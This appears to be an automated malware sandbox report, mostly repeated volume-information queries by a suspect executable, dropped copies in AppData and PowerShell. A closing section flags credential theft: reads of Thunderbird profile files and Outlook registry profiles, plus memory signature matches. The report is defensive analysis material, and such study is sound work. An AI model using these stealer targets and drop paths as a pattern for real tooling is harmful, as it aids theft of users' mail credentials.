              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Users\user\Desktop\izwFjkhFJm.exe VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Queries volume information: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_018EF6D0 GetUserNameW,

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: Oefdyik.exe PID: 6036, type: MEMORYSTR
              Source: Yara match | File source: 0000001B.00000002.534154582.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: Oefdyik.exe PID: 6036, type: MEMORYSTR
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
